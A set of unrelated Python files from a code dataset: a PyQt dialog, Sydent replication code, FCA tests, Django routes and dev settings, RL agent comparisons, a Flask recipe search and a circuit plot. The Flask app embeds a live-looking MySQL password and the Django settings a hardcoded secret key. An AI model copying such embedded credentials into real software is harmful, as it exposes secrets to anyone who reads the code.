self._is_ok_to_close:\n self._logger.debug(\n 'Forward model path is set to \"%s\"' % self.fwd_path\n )\n self.accept()\n\n def _copy_fwd_to_folders_struct(\n self, src_path, montage=\"imported\", spacing=\"imported\"\n ):\n dest_dir = op.join(self._cur_anat_fwds_path, montage, spacing)\n fname = op.split(src_path)[1]\n dest_path = op.join(dest_dir, fname)\n try:\n os.makedirs(dest_dir)\n except OSError:\n self._logger.warning(\"Destination folder %s exists.\" % dest_dir)\n self._logger.info(\"Copying to %s\" % dest_dir)\n try:\n shutil.copyfile(src_path, dest_path)\n except shutil.SameFileError:\n self._logger.warning(\"File is already there. Skipping..\")\n\n return dest_path\n\n def _copy_anat_to_folders_struct(self, src_subjects_dir, subject):\n dest_subjects_dir = op.join(COGNIGRAPH_DATA, \"anatomy\")\n src_path = op.join(src_subjects_dir, subject)\n dest_path = op.join(dest_subjects_dir, subject)\n if not op.isdir(op.join(dest_subjects_dir, subject)):\n self._logger.info(\"Copying anatomy to %s \" % dest_subjects_dir)\n shutil.copytree(src_path, dest_path)\n elif src_path != dest_path:\n answer = QMessageBox.question(\n self,\n \"Destination folder exists\",\n 'Anatomy for subject \"%s\" exists. Overwrite?' % subject,\n QMessageBox.Yes | QMessageBox.No,\n )\n if answer == QMessageBox.Yes:\n self._logger.info(\n \"Overwriting anatomy for subject %s.\" % subject\n )\n shutil.rmtree(dest_path)\n shutil.copytree(src_path, dest_path)\n else:\n self._logger.info(\n \"Keeping existing anatomy for subject %s.\" % subject\n )\n else:\n self._logger.info(\n \"Source and destination folders are the same.\" \" Skipping.\"\n )\n return dest_path\n\n def _reset_forward_groupbox(self):\n if (\n self._anat_gpbox.is_use_available_anat\n and self._forward_gpbox.use_default_fwd_radio.isChecked()\n ):\n self._fwd_geom_gpbox.get_available_forwards(\n op.join(COGNIGRAPH_DATA, \"forwards\", self._anat_gpbox.subject)\n )\n self._fwd_geom_gpbox.is_use_available = True\n\n\nif __name__ == \"__main__\":\n from PyQt5.QtWidgets import QApplication\n import sys\n\n format = \"%(asctime)s:%(name)-17s:%(levelname)s:%(message)s\"\n logging.basicConfig(level=logging.DEBUG, filename=None, format=format)\n\n class MW(QMainWindow):\n def __init__(self, parent=None):\n QMainWindow.__init__(self, parent)\n self.button = QPushButton(\"Push me\")\n self.button.clicked.connect(self._on_clicked)\n self.dialog = FwdSetupDialog(parent=self)\n self.setCentralWidget(self.button)\n\n def _on_clicked(self):\n self.dialog.show()\n\n app = QApplication(sys.argv)\n # wind = MW()\n # wind.setAttribute(Qt.WA_DeleteOnClose)\n\n dialog = FwdSetupDialog()\n dialog.show()\n # wind.show()\n # wind.show()\n # app.exec_()\n\n sys.exit(app.exec_())\n","sub_path":"cognigraph/gui/forward_dialog.py","file_name":"forward_dialog.py","file_ext":"py","file_size_in_byte":49673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"214892300","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2014 OpenMarket Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language 
governing permissions and\n# limitations under the License.\n\nimport logging\n\nimport twisted.internet.task\n\nfrom sydent.util import time_msec\nfrom sydent.replication.peer import LocalPeer\nfrom sydent.db.threepid_associations import LocalAssociationStore\nfrom sydent.db.peers import PeerStore\nfrom sydent.threepid.signer import Signer\n\nlogger = logging.getLogger(__name__)\n\n\nclass Pusher:\n def __init__(self, sydent):\n self.sydent = sydent\n self.pushing = False\n self.peerStore = PeerStore(self.sydent)\n\n def setup(self):\n cb = twisted.internet.task.LoopingCall(Pusher.scheduledPush, self)\n cb.clock = self.sydent.reactor\n cb.start(10.0)\n\n def getSignedAssociationsAfterId(self, afterId, limit):\n assocs = {}\n\n localAssocStore = LocalAssociationStore(self.sydent)\n (localAssocs, maxId) = localAssocStore.getAssociationsAfterId(afterId, limit)\n\n signer = Signer(self.sydent)\n\n for localId in localAssocs:\n sgAssoc = signer.signedThreePidAssociation(localAssocs[localId])\n assocs[localId] = sgAssoc\n\n return (assocs, maxId)\n\n def doLocalPush(self):\n \"\"\"\n Synchronously push local associations to this server (ie. copy them to globals table)\n The local server is essentially treated the same as any other peer except we don't do the\n network round-trip and this function can be used so the association goes into the global table\n before the http call returns (so clients know it will be available on at least the same ID server they used)\n \"\"\"\n localPeer = LocalPeer(self.sydent)\n\n (signedAssocs, _) = self.getSignedAssociationsAfterId(localPeer.lastId, None)\n\n localPeer.pushUpdates(signedAssocs)\n\n def scheduledPush(self):\n if self.pushing:\n return\n self.pushing = True\n\n updateDeferred = None\n\n try:\n peers = self.peerStore.getAllPeers()\n\n for p in peers:\n if p.lastSentVersion:\n logger.debug(\"Looking for update after %d to push to %s\", p.lastSentVersion, p.servername)\n else:\n logger.debug(\"Looking for update to push to %s\", p.servername)\n (signedAssocTuples, maxId) = self.getSignedAssociationsAfterId(p.lastSentVersion, 100)\n logger.debug(\"%d updates to push to %s\", len(signedAssocTuples), p.servername)\n if len(signedAssocTuples) > 0:\n logger.info(\"Pushing %d updates to %s\", len(signedAssocTuples), p.servername)\n updateDeferred = p.pushUpdates(signedAssocTuples)\n updateDeferred.addCallback(self._pushSucceeded, peer=p, maxId=maxId)\n updateDeferred.addErrback(self._pushFailed, peer=p)\n break\n finally:\n if not updateDeferred:\n self.pushing = False\n\n def _pushSucceeded(self, result, peer, maxId):\n logger.info(\"Pushed updates up to %d to %s with result %d %s\",\n maxId, peer.servername, result.code, result.phrase)\n\n self.peerStore.setLastSentVersionAndPokeSucceeded(peer.servername, maxId, time_msec())\n\n self.pushing = False\n self.scheduledPush()\n\n def _pushFailed(self, failure, peer):\n logger.info(\"Failed to push updates to %s: %s\", peer.servername, failure)\n self.pushing = False\n return None\n","sub_path":"sydent/replication/pusher.py","file_name":"pusher.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"151064797","text":"import numpy as np\nimport pandas as pd\nimport pytest\nfrom fca import Concept, Context\nfrom fca.metrics import concept_cohesion, object_similarity\n\n\n@pytest.fixture\ndef context_animals():\n columns = [\n 'give milk',\n 'give meat',\n 'give wool or coat',\n 'give eggs',\n 'suitable for towing'\n 
]\n\n rows = [\n 'chicken',\n 'turkey',\n 'horse',\n 'donkey',\n 'duck',\n 'goose',\n 'sheep',\n 'goat'\n ]\n\n data = np.array(\n (\n (0, 1, 0, 1, 0),\n (0, 1, 0, 1, 0),\n (0, 1, 0, 0, 1),\n (0, 1, 0, 0, 1),\n (0, 1, 1, 1, 0),\n (0, 1, 1, 0, 0),\n (1, 1, 1, 0, 0),\n (1, 1, 0, 0, 0)\n ),\n dtype=bool\n )\n\n context = Context(pd.DataFrame(data=data, index=rows, columns=columns))\n\n return context\n\n@pytest.fixture\ndef context():\n data = np.array(((True, True, False),\n (True, False, False),\n (False, True, False)))\n\n return Context(pd.DataFrame(data))\n\n\nclass TestConceptMinimalCoherence():\n def test_concept_minimal_smc_cohesion(self, context):\n concept = Concept(np.ones(3, dtype=bool),\n np.zeros(3, dtype=bool))\n\n cohesion = concept_cohesion.minimal(\n concept,\n context,\n object_similarity.smc)\n\n assert cohesion == 1 / 3\n\n def test_concept_minimal_smc_cohesion2(self, context):\n concept = Concept(np.array([True, True, False], dtype=bool),\n np.array([True, False, False], dtype=bool))\n\n cohesion = concept_cohesion.minimal(\n concept,\n context,\n object_similarity.smc)\n\n assert cohesion == 2 / 3\n\n def test_concept_minimal_jaccard_cohesion(self, context):\n concept = Concept(np.array([True, False, False], dtype=bool),\n np.array([True, True, False], dtype=bool))\n\n cohesion = concept_cohesion.minimal(\n concept,\n context,\n object_similarity.jaccard)\n\n assert cohesion == 1\n\n def test_concept_minimal_jaccard_cohesion2(self, context):\n concept = Concept(np.array([False, False, False], dtype=bool),\n np.array([True, True, True], dtype=bool))\n\n cohesion = concept_cohesion.minimal(\n concept,\n context,\n object_similarity.jaccard)\n\n assert cohesion == 0\n\nclass TestConceptAvgCoherence():\n def test_concept_avg_jaccard_cohesion(self, context_animals):\n\n concept = Concept(np.ones(8, dtype=bool),\n np.array([False, True, False, False, False]))\n\n cohesion = concept_cohesion.avg(\n concept,\n context_animals,\n object_similarity.jaccard)\n\n assert cohesion == pytest.approx(0.4255952, 0.00001)\n\n def test_concept_avg_jaccard_cohesion2(self, context_animals):\n concept = Concept(np.array([False, False, False, False, False, False, True, True]),\n np.array([True, True, False, False, False]))\n\n cohesion = concept_cohesion.avg(\n concept,\n context_animals,\n object_similarity.jaccard)\n\n assert cohesion == pytest.approx(0.6666666, 0.00001)\n\n def test_concept_avg_jaccard_cohesion3(self, context_animals):\n concept = Concept(np.array([False, False, False, False, False, False, True, False]),\n np.array([True, True, True, False, False]))\n\n cohesion = concept_cohesion.avg(\n concept,\n context_animals,\n object_similarity.jaccard)\n\n assert cohesion == 1\n","sub_path":"fca/metrics/tests/test_concept_cohesion.py","file_name":"test_concept_cohesion.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"592588011","text":"from django.urls import path, include\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom . 
import views\n\nurlpatterns = [\n\tpath('upload_icollect/', views.upload_icollect, name='upload_icollect'),\n\tpath('neftswift/', views.neftswift, name='neftswift'),\n\tpath('getrawpayments/', views.getrawpayments, name='getrawpayments'),\n\tpath('getstudent/', views.getstudent, name='getstudent'),\n\tpath('editrawpayment/', views.editrawpayment, name='editrawpayment'),\n\tpath('updatetransaction/', views.updatetransaction, name='updatetransaction'),\n\tpath('updateremarks/', views.updateremarks, name='updateremarks'),\n\tpath('hostelAndMessTransactions/', views.hostelAndMessTransactions, name='hostelAndMessTransactions'),\n\tpath('editTransactionRegno/', views.editTransactionRegno, name='editTransactionRegno'),\n\tpath('getTransaction/', views.getTransaction, name='getTransaction'),\n\tpath('paymentStatus/', views.paymentStatus, name='paymentStatus'),\n\tpath('feeDefaulters/', views.feeDefaulters, name='feeDefaulters'),\n\tpath('incomeCertificate/', views.incomeCertificate, name='incomeCertificate'),\n\tpath('acceptIncomeCertificate//', views.acceptIncomeCertificate, name='acceptIncomeCertificate'),\n\tpath('rejectIncomeCertificate/', views.rejectIncomeCertificate, name='rejectIncomeCertificate'),\n\tpath('tuitionFee/', views.tuitionFee, name='tuitionFee'),\n\tpath('acceptTuitionFee//', views.acceptTuitionFee, name='acceptTuitionFee'),\n\tpath('exportPayments/', views.exportPayments, name='exportPayments'),\n\tpath('importPayments/', views.importPayments, name='importPayments'),\n\tpath('exportCertificates/', views.exportCertificates, name='exportCertificates'),\n\tpath('rejectTuitionFee/', views.rejectTuitionFee, name='rejectTuitionFee'),\n\tpath('downloadFiles/', views.downloadFiles, name='downloadFiles'),\n]\n","sub_path":"payments/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"537777248","text":"import socket\n\nfrom .base import *\n\nDEBUG = True\n\nEXECUTING_AS_TEST = 'True'\n\nSESSION_COOKIE_SECURE = False\n\nPUBLIC_APPLICATION_URL = os.environ.get('PUBLIC_APPLICATION_URL', 'http://localhost:8000/childminder')\n\nPAYMENT_URL = os.environ.get('APP_PAYMENT_URL', 'http://localhost:8001/payment-gateway')\n\nADDRESSING_URL = os.environ.get('APP_ADDRESSING_URL', 'http://localhost:8002/addressing-service')\n\nNOTIFY_URL = os.environ.get('APP_NOTIFY_URL', 'http://localhost:8003/notify-gateway')\n\n# Base URL of integration adapter for interfacing with NOO\nINTEGRATION_ADAPTER_URL = os.environ.get('APP_INTEGRATION_ADAPTER', 'http://localhost:8004/integration-adapter')\n\nINTERNAL_IPS = [\"127.0.0.1\", \"localhost\"]\n\nINTERNAL_IPS += [socket.gethostbyname(socket.gethostname())[:-1] + '1']\n\nALLOWED_HOSTS = ['*']\n\nTEST_NOTIFY_CONNECTION = False\n\nDEV_APPS = [\n 'debug_toolbar',\n 'django_extensions'\n]\n\n# GTM Container ID\nGOOGLE_TAG_MANAGER_ID = \"GTM-TMKB37K\"\n\nMIDDLEWARE_DEV = [\n 'debug_toolbar.middleware.DebugToolbarMiddleware'\n]\n\nEMAIL_EXPIRY = 1\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': os.environ.get('POSTGRES_DB', 'ofs'),\n 'USER': os.environ.get('POSTGRES_USER', 'ofs'),\n 'PASSWORD': os.environ.get('POSTGRES_PASSWORD', 'ofs'),\n 'HOST': os.environ.get('POSTGRES_HOST', 'localhost'),\n 'PORT': os.environ.get('POSTGRES_PORT', '5432')\n }\n}\n\nMIDDLEWARE = MIDDLEWARE + MIDDLEWARE_DEV\nINSTALLED_APPS = BUILTIN_APPS 
+ THIRD_PARTY_APPS + DEV_APPS + PROJECT_APPS\n\nSECRET_KEY = '-asdasdsad322432maq#j23432*&(*&DASl6#mhak%8rbh$px8e&9c6b9@c7df=m'\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'console': {\n # exact format is not important, this is the minimum information\n 'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n },\n },\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.TimedRotatingFileHandler',\n 'filename': 'logs/output.log',\n 'formatter': 'console',\n 'when': 'midnight',\n 'backupCount': 10\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler'\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n 'django.server': {\n 'handlers': ['console'],\n 'level': 'INFO',\n 'propagate': True,\n },\n },\n}\n\n# AWS SQS keys\nAWS_SQS_ACCESS_KEY_ID = os.environ.get('AWS_SQS_ACCESS_KEY_ID')\nAWS_SQS_SECRET_ACCESS_KEY = os.environ.get('AWS_SQS_SECRET_ACCESS_KEY')\n\nSQS_QUEUE_PREFIX = os.environ.get('SQS_QUEUE_PREFIX', 'DEV')\nPAYMENT_NOTIFICATIONS_QUEUE_NAME = SQS_QUEUE_PREFIX + '_PAYMENT_NOTIFICATIONS'\n\n# The prefix added before a URN for finance system reconciliation purposes\nPAYMENT_URN_PREFIX = 'EY'\n\n# The prefix used to distinguish Worldpay payment entries for MORE\nPAYMENT_REFERENCE_PREFIX = 'MO'\n","sub_path":"childminder/settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"316393796","text":"from q_table_agent import greedy_policy, discretize\nfrom reinforce_agent import logistic_regression\nfrom saes_agent import NeuralNetworkPolicy\nfrom envs.deep_cure_env import DeepCure, ForeignCountry, random_base_infect_rate, random_lifetime, random_delay\nfrom plotting import plot\nfrom stable_baselines3 import DQN\nfrom prettytable import PrettyTable\n\nimport numpy as np\n\ndef constant_action(env, action,rate, lifetime, delay):\n state = env.reset(rate, lifetime, delay)\n end = False\n while not end:\n state, reward, end, _ = env.step(action)\n return env\n\ndef reinforce(env, theta, rate, lifetime, delay):\n obs = env.reset(rate,lifetime,delay)\n done = False\n while not done:\n probs = logistic_regression(obs, theta)\n actions = probs >= 0.5\n obs, reward, done, _ = env.step(actions)\n return env\n\ndef q_table(env, table, stepsize, num_states, rate, lifetime, delay):\n state = discretize(env.reset(rate,lifetime,delay), stepsize, num_states)\n end = False\n t = 0\n while not end :\n action = greedy_policy(state, table)\n state, reward, end, _ = env.step(action)\n state = discretize(state, stepsize, num_states)\n return env\n\ndef saes(env, policy, theta, rate, lifetime, delay):\n obs = env.reset(rate,lifetime,delay)\n done = False\n while not done:\n probs = policy(obs, theta)\n actions = probs >= 0.5\n obs, reward, done, _ = env.step(actions)\n return env\n\ndef stable(env, model, rate, lifetime, delay):\n obs = env.reset(rate, lifetime, delay)\n done = False\n while not done:\n action, _states = model.predict(obs, deterministic=True)\n obs, reward, done, info = env.step(action)\n return env\n\ndef save_metrics(env, metric_dict, n):\n reward = sum(env.hist_reward)\n actions = np.array(env.hist_action)\n actions = np.sum(actions, axis=0)/len(env.hist_action)\n actions[2] = 1-actions[2]\n actions /= n\n dead_ratio = env.hist_dead[-1]/env.population\n infected_ratio = env.hist_infected[-1]/env.population\n 
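# accumulate this run's metrics so compare() can aggregate over all n runs\n    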
metric_dict['reward'].append(reward)\n metric_dict['actions'] += actions\n metric_dict['dead'].append(dead_ratio)\n metric_dict['infected'].append(infected_ratio)\n return reward\n\ndef compare(agents, n = 250):\n results = [{'reward': [], 'actions': np.zeros(3), 'dead': [], 'infected': [], 'best': 0} for i in range(len(agents))]\n current_reward = np.zeros(len(agents))\n for _ in range(n):\n rate = random_base_infect_rate()\n lifetime = random_lifetime()\n delay = [random_delay()]\n for i,(name,agent) in enumerate(agents):\n # run agent\n env = agent(rate, lifetime, delay)\n current_reward[i] = save_metrics(env, results[i], n)\n # get best reward\n results[np.argmax(current_reward)]['best'] += 1./n\n\n # print statistic\n table = PrettyTable()\n table.field_names = ['Agent', 'Best', 'Mean Reward', 'Std Reward', 'Mean Dead', 'Std Dead', 'Mean Infected', 'Std Infected', 'Actions']\n for i,(name,agent) in enumerate(agents):\n result = results[i]\n reward = np.array(result['reward'])\n dead = np.array(result['dead'])\n infected = np.array(result['infected'])\n masks, curfew, borders = result['actions']\n table.add_row([name, result['best'], np.mean(reward), np.std(reward), np.mean(dead), np.std(dead), np.mean(infected), np.std(infected), f'{masks} / {curfew} / {borders}'])\n\n print(table)\n\n\nSEED = 22\nnp.random.seed(SEED)\nenv = DeepCure(foreign_countries = [ForeignCountry(0.1,100,100_000, save_history=True)], save_history=True, seed=SEED)\nenv.reset()\n\n# this environment is for DQN which uses discrete action space\nenv2 = DeepCure(foreign_countries = [ForeignCountry(0.1,100,100_000, save_history=True)], use_discrete = True, save_history=True, seed=SEED)\nenv2.reset()\n\n\ntheta = np.load('theta.npy')\n\nq_table100 = np.load('qtable-100.npy')\nq_table1000 = np.load('qtable-1000.npy')\n\ntheta_saes = np.load('saes-theta.npy')\npolicy = NeuralNetworkPolicy(env, one_layer=True)\n\ntheta_saes2 = np.load('saes-theta2.npy')\npolicy2 = NeuralNetworkPolicy(env, h_size=10, one_layer=False)\n\nmodel = DQN.load(\"best_model\")\n\nagents = [\n ('Action nothing', lambda r,l,d: constant_action(env, [False,False,True], r, l, d)),\n ('Action nothing (closed borders)', lambda r,l,d: constant_action(env,[False,False,False], r, l, d)),\n ('Action masks', lambda r,l,d: constant_action(env, [True,False,True], r, l, d)),\n ('Action masks (closed borders)', lambda r,l,d: constant_action(env, [True,False,False], r, l, d)),\n ('Action curfew', lambda r,l,d: constant_action(env, [False,True,True], r, l, d)),\n ('Action curfew (closed borders)', lambda r,l,d: constant_action(env, [False,True,False], r, l, d)),\n ('Action both', lambda r,l,d: constant_action(env, [True,True,True], r, l, d)),\n ('Action both (closed borders)', lambda r,l,d: constant_action(env, [True,True,False], r, l, d)),\n ('reinforce', lambda r,l,d: reinforce(env, theta, r, l, d)),\n ('qtable 100', lambda r,l,d: q_table(env, q_table100, 100, np.minimum((env.observation_space.high - env.observation_space.low)/10, 10).astype(int), r, l, d)),\n ('qtable 1000', lambda r,l,d: q_table(env, q_table1000, 1000, np.minimum((env.observation_space.high - env.observation_space.low)/10, 10).astype(int), r, l, d)),\n ('SAES 1', lambda r,l,d: saes(env, policy, theta_saes, r, l, d)),\n ('SAES 2', lambda r,l,d: saes(env, policy2, theta_saes2, r, l, d)),\n ('DQN', lambda r,l,d: stable(env2, model, r, l, d))\n]\n\n\n# runs 250 environments and tests each agent\ncompare(agents)\n\n# runs q_table agent\n# q_table(env, q_table100, 100, 
np.minimum((env.observation_space.high - env.observation_space.low)/10, 10).astype(int), 1.7, 100, [40])\n\n# runs saes agent\n# saes(env, policy, theta_saes, 1.7, 100, [40])\n\n# runs deep_q agent\n# deep_q(env, theta, 1.7, 100, [40])\n\n# runs a baseline agent\n# constant_action(env, [True, True, False], 1.7, 100, [40])\n\n# uncomment to plot the latest run\n# print(f'Reward {sum(env.hist_reward)}')\n# plot(env)\n","sub_path":"deep_cure_learning/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":6099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"475369417","text":"from __future__ import print_function\nfrom flask import Flask, render_template, request, jsonify\nfrom sqlalchemy import create_engine\n#from car_data import get_cars_by # Week 12 Day 1 Sample Demo code\nimport json\nimport sys\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\n\nrecipe_data = \"mysql+mysqlconnector://{username}:{password}@{hostname}/{databasename}\".format(\n username=\"code2college\",\n password=\"iamnotspam\",\n hostname=\"code2college.mysql.pythonanywhere-services.com\",\n databasename=\"code2college$MyData\")\n\nengine = create_engine(recipe_data)\n\n### START Week12 Day 1 demo code ###\n# @app.route('/', methods=[\"GET\"])\n# def index():\n# return render_template(\"week12day1examplecode.html\")\n\n# @app.route('/carsearch', methods=[\"GET\"])\n# def car_search():\n# #print \"Entering method car_search\"\n\n# year = request.args[\"year\"] if request.args.has_key(\"year\") else None\n# make = request.args[\"make\"] if request.args.has_key(\"make\") else None\n# model = request.args[\"model\"] if request.args.has_key(\"model\") else None\n\n# #print \"year: \" + year + \" make: \" + make + \" model: \" + model\n\n# result = {\"message\": \"No results\"}\n\n# result[\"rows\"] = get_cars_by(year, make, model)\n\n\n# if result[\"rows\"]:\n# result[\"message\"] = str(len(result[\"rows\"])) + \" results\"\n\n# return jsonify(result)\n\n### END Week12 Day 1 demo code ###\n\n\n@app.route('/', methods=[\"GET\"])\ndef index():\n return render_template(\"main_page.html\")\n\n@app.route('/recipes', methods=[\"GET\"])\ndef get_recipes():\n name = request.args.get(\"name\")\n category = request.args.get(\"category\")\n url= request.args.get(\"url\")\n # below is how we can print to our error log, will probably remove this once debugging is complete\n print(\"request recieved: name:{0} category: {1} url: {2}\".format(name, category, url), file=sys.stderr)\n sql_query_string, params = create_query(name, category, url)\n # below is a good debug line, but will probably remove once debugging is complete\n print(\"sql_query_string: {0} params: {1}\".format(sql_query_string, params), file=sys.stderr)\n # definition for this execute method signature here https://dev.mysql.com/doc/connector-python/en/connector-python-api-mysqlcursor-execute.html\n results = engine.execute(sql_query_string, params)\n return json.dumps([(dict(row.items())) for row in results])\n\ndef create_query(name, category, url):\n need_or_operator = False\n query_string = \"SELECT recipe_name, recipe_link, category FROM RecipeData\"\n params = ()\n # we will set convention to always add a space at the BEGINNING of the sql chunk we're adding\n if name != \"\":\n query_string += \" WHERE recipe_name LIKE %s\"\n need_or_operator = True\n params += (\"%\"+name+\"%\",)\n if category != \"\":\n if need_or_operator:\n query_string += \" OR category = %s\"\n else:\n 
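# no clause has been added yet, so this filter opens the WHERE\n            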
query_string += \" WHERE category = %s\"\n need_or_operator = True\n params += (category,)\n if url != \"\":\n if need_or_operator:\n query_string += \" OR recipe_link LIKE %s\"\n else:\n query_string += \" WHERE recipe_link LIKE %s\"\n params += (\"%\"+url+\"%\",)\n # we're adding this limit to cover the scenario the user didn't supply any\n # paramters. We don't want to return ALL the rows in our DB!\n query_string += \" limit 5\"\n\n return query_string, params\n","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"94625254","text":"import numpy as np\r\nfrom scipy.stats import norm\r\nimport time\r\nimport math\r\n\r\n# ' Likelihood for general Random Utility Models\r\n# '\r\n# ' @param Data ranking data\r\n# ' @param parameter Mean of Exponential Distribution\r\n# ' @param range range\r\n# ' @param res res\r\n# ' @param race TRUE if data is sub partial, FALSE (default) if not\r\n# ' @return log likelihood\r\n# ' @export\r\n# ' @examples\r\n# ' data(Data.Test)\r\n# ' parameter = Generate.RUM.Parameters(5, \"normal\")\r\n# ' Likelihood.RUM(Data.Test,parameter, \"norm\")\r\n'''\r\n Title: likelihoodRUM\r\n Authors: Tristan Villamil\r\n Lirong Xia\r\n Zhibing Zhao\r\n\r\n Description: The algorithm\r\n\r\n Input:\r\n Data - the ranking\r\n numpy array of rankings, see generate.py GenerateRUMData for data generation.\r\n parameter - mean of exponental distribution\r\n numpy array of means, see generate.py GenerateRUMParameters for generation\r\n range_var - range\r\n float\r\n res - res\r\n float\r\n\r\n Output:\r\n likelihood that Data belongs to parameter\r\n float\r\n'''\r\ndef likelihoodRUM(Data, parameter, range_var = None, res = None):\r\n t0 = time.time()\r\n if range_var == None:\r\n range_var = parameter[\"Mean\"].max() + 3 * parameter[\"SD\"].max()\r\n if res == None:\r\n res = range_var / 10000\r\n\r\n rank = Data\r\n S = range_var / res\r\n x = []\r\n for i in range(-int(S), int(S) + 1):\r\n x.append(i * res)\r\n\r\n n = rank.shape[0]\r\n m = 4\r\n\r\n ll = 0\r\n CDF = np.ones((1,len(x)), int)\r\n for j in range(m - 1, -1,-1):\r\n PDF = norm.pdf(x, loc=parameter[\"Mean\"][rank[j] - 1],scale=parameter[\"SD\"][rank[j] - 1])*CDF\r\n CDF = res * PDF.cumsum()\r\n ll = CDF[len(x) - 1]\r\n tf = time.time()\r\n #print(\"likelihood time:\", tf - t0)\r\n return ll","sub_path":"likelihood_rum.py","file_name":"likelihood_rum.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"553406812","text":"\"\"\"platforms\n\nRevision ID: 2910519f8cbe\nRevises: bff19a58f1f\nCreate Date: 2015-12-08 17:33:20.319225\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '2910519f8cbe'\ndown_revision = 'bff19a58f1f'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n op.create_table(\n 'platforms',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=100), nullable=False),\n sa.Column('node', sa.String(length=100), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n\n\ndef downgrade():\n op.drop_table('platforms')\n","sub_path":"migrations/alembic/versions/2910519f8cbe_platforms.py","file_name":"2910519f8cbe_platforms.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"78721324","text":"import numpy as 
np\nimport matplotlib.pyplot as plt\n\n#Constants\nR1 = 10.0\nR2 = 10.0\nL1 = 15.0 * 10**(-3)\nL2 = 15.0 * 10**(-3)\nC1 = 50.0 * 10**(-6)\nC2 = 50.0 * 10**(-6)\nI1 = 12.0\n\n#Real part of Phi (a)\ndef a(w):\n    a1 = R1\n    a2 = -1.0*R1*L2*C1*(w**2)\n    a3 = R2*L1*L2*C1*C2*(w**4)\n    a4 = -1.0*R2*L1*C2*(w**2)\n    a5 = -1.0*R2*L1*C1*(w**2)\n    a6 = -1.0*R2*L2*C2*(w**2)\n    a7 = R2\n    ans = a1 + a2 + a3 + a4 + a5 + a6 + a7\n    return ans\n\n#Imaginary part of Phi (b)\ndef b(w):\n    b1 = -1.0*R1*R2*L2*C1*C2*(w**2)\n    b2 = R1*R2*C2*w\n    b3 = R1*R2*C1*w\n    b4 = w*L1\n    b5 = -1.0*L1*L2*C1*(w**3)\n    b6 = L2*w\n    ans = b1 + b2 + b3 + b4 + b5 + b6\n    return ans\n\n#Magnitude of Vr2\ndef mag(a,w,b):\n    up = I1*R1*R2\n    down = np.sqrt((a(w)**2) + (b(w)**2))\n    ans = up/(down*1.0)\n    return ans\n\n#Phase angle of Vr2\ndef ang(a,w,b):\n    e = b(w)/(a(w)*1.0)\n    ans = -1.0*np.arctan(e)\n    return ans\n\n#Generate w points\nww = np.linspace(0,6000,1000)\n\n#Evaluated w points\nmm = mag(a,ww,b)\naa = ang(a,ww,b)\n\n#Plot\nplt.plot(ww,mm)\nplt.title(\"Magnitud Vr2 vs. Frecuencia Angular\")\nplt.xlabel(\"Frecuencia angular (w) [rad/s]\")\nplt.ylabel(\"Magnitud [V]\")\nplt.savefig(\"Magnitud_Vr2.png\")\nplt.clf()\nplt.plot(ww,aa)\nplt.title(\"Fase Vr2 vs. Frecuencia Angular\")\nplt.xlabel(\"Frecuencia angular (w) [rad/s]\")\nplt.ylabel(\"Angulo de fase [rad]\")\nplt.savefig(\"Fase_Vr2.png\")\nplt.clf()\n","sub_path":"Tarea2_Vr2.py","file_name":"Tarea2_Vr2.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
